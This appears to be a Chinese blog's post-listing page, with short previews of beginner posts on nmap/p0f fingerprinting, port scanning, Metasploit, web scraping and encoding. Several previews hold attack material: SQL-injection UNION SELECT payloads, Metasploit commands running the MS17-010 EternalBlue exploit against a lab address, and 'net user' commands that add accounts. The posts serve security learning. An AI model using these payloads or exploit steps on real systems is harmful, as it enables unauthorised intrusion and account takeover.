- 博客(67)
- 收藏
- 关注
RSS订阅原创 系统指纹识别
方法二:可以使用wireshark捕获一个数据包文件,然后使用p0f对这个文件进行分析,使用-r参数指定数据包文件。输出的信息中显示了客户端与服务器的详细信息,包含操作系统类型,地址,以太网模式,运行的服务器和端口号等。输出的信息显示了主机的指纹信息,包含目标主机打开的端口信息,MAC地址,操作系统类型和内核版本等。方法一:输入p0f命令,然后顺便访问需要识别的网站即可。使用nmap命令的-O参数识别操作系统指纹信息。也可以使用-o参数把结果保存到文件中。使用p0f识别操作系统指纹信息。
2025-01-04 13:08:51
216
原创 查看打开的端口
如果目标主机上打开的端口较多时,用户查看起来可能有点困难。输出信息显示了主机www.yiai.xyz上端口在1~1000之间所开放的端口号。对一个大范围的网络或活跃的主机进行渗透测试,需要了解这些主机上所打开的端口号。输出的信息显示了主机www.yiai.xyz上开放的所有端口。
2025-01-03 22:06:02
275
原创 使用nmap识别活跃的主机
kali技术-使用nmap识别活跃的主机_哔哩哔哩_bilibili。三是可以推断主机所用的操作系。工具其基本功能有三个,一是探。使用Nmap识别主机是否在线。描主机端口,嗅探所提供的网。描和嗅探工具包,也叫网。
2025-01-03 14:41:14
206
原创 sql注入
id=1' and 0 union select (select 字段名 from guestbook limit 0,1),311 -- +联合查询可以使用sqlmap工具,但如果需要注入需要登录的网站如dvwa,需要在url后面加上cookie,格式为。改变n的值一直到报错,则字段数等于报错前n的值,此处字段数是2。即id=1' and 1 order by 1 -- +比如可以使用' " and or 1=1 1=2做检测。(1)判断字段数:order by n。改变0,1中0的值可以看到其他的表。
2024-12-03 15:31:15
268
原创 制作爬取4399游戏名称软件
请求头={'User-Agent':'Mozilla/5.0 (Windows NT 10.0;网站源代码=requests.get(url=链接,headers=请求头).text #发送请求并且拿到网站源代码。class属性的结果=初始化.find(class_="tm_list") #class是关键字。li标签内容=class属性的结果.find_all('li') #list。链接='https://www.4399.com/' #网站链接。#发送请求并且拿到源代码。
2024-07-06 16:25:50
476
原创 爬虫实战-房天下(bengbu.zu.fang.com/)数据爬取
//*[@id="rentid_D09_01_02"]/a a后面没有加/text()from lxml import etree #xpath解析库。res=etree.HTML(res) #初始化。res=源代码(url)#response是源代码。
2024-04-29 21:18:55
1755
原创 爬虫-解析数据
html=BeautifulSoup(res,'lxml') #初始化。html=etree.HTML(res) #初始化。#self.用xpath解析数据(res)xpath=f.用xpath解析数据(res)初始化后的源代码.find_all(self.用bs解析数据(res)res=self.爬取源代码()bs=f.用bs解析数据(res)res=f.爬取源代码()
2024-04-23 10:15:09
960
原创 MS17_010永恒之蓝漏洞利用
msf6 > use exploit/windows/smb/ms17_010_eternalbluemsf6 exploit(windows/smb/ms17_010_eternalblue) > optionsmsf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.115.133msf6 exploit(windows/smb/ms17_010_eternalblue) > runmsf6 exploit(windo
2024-04-22 19:02:39
704
原创 密码安全防护
base家族:base64 组成:数字,字母大小写,+,/,=密文:%E9%BB%91%E5%AE%A2。ascii十六进制分别是:61 63 64。url加密是:%61%63%64。ASCII码十六进制前面加%明文:“黑客” URL编码。
2024-04-22 12:19:46
424
原创 黑客常用命令
net user abc adb /add 创建用户。net user hbzx 1223 修改用户密码。TTL值可以用于大概知道对方服务器操作系统类型。net user hbzx /del 删除用户。net user显示系统的用户。域名是ip的另一种表现形式。telent 3389端口。-n 2 ping2次。
2024-04-21 17:23:02
701
2
原创 黑客知识了解
当我输入账号密码后会把账号密码给后端的数据库进行查询,查询到(你的账号密码都对)就可以登录进去了,如果有一个错那就查询不到那就登录不进去。ip地址:每个电脑都有2个ip地址:127.0.0.1(固定)代表自己电脑ip和自己电脑ip。被动信息收集:通过搜索引擎搜索出服务器公开出来的信息(比如:网站属于哪个公司)主动信息收集:通过扫描工具与服务器直接接触收集到的信息(比如:服务器漏洞)ip组成:由网络号(网络ID)和主机号(主机ID)组成。外部命令(你自己下载的命令)内部命令(系统自带命令)
2024-04-20 19:53:55
753
2
原创 MetaSploit扫描指定端口的主机
msf6 > search portscan type:auxiliarymsf6 > use 5msf6 auxiliary(scanner/portscan/tcp) > optionsmsf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.115.134msf6 auxiliary(scanner/portscan/tcp) > runmsf6 auxiliary(scanner/portscan/tcp) > set ports
2024-04-20 09:20:22
878
原创 黑客框架-MSF(metasploit)使用
msf6 auxiliary(scanner/portscan/syn) > set RHOSTS 127.0.0.1 #设置rhosts参数为明白主机 rhosts大小写都可以。msf6 auxiliary(scanner/portscan/syn) > unset rhosts #取消设置。msf6 auxiliary(scanner/portscan/syn) > info #显示这个模块的详细信息。msf6 > use auxiliary/scanner/portscan/syn #使用模块。
2024-04-19 19:40:57
282
原创 python二级题目-使用 turtle 库的 turtle.fd() 函数和 turtle.seth() 函数绘制一个边长为 200的正方形,效果如下图所示。请结合格式框架,补充横线处代码。
d = 0#d = 90+dd=90*(i+1)'''turtle 海龟fd 向前seth 朝向done'''
2024-04-19 09:39:36
1111
原创 实战1-批量爬取百度图片(上)
任务描述:当输入关键字时会爬取100个与关键词有关的图片到本地每个关键词单独保存到一个文件夹中,比如说我输入黑客下载了100个关于黑客的图片这些图片都保存到“黑客”文件夹,然后输入python会爬取100个与python有关的图片保存到本地的"python"文件夹中。return self.解析源代码(res)li=self.发送请求(url,word,30)pip install pyinstaller 打包程序。self.发送请求(url=i)pip install 模块名 [-i。
2024-04-18 21:24:07
1131
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人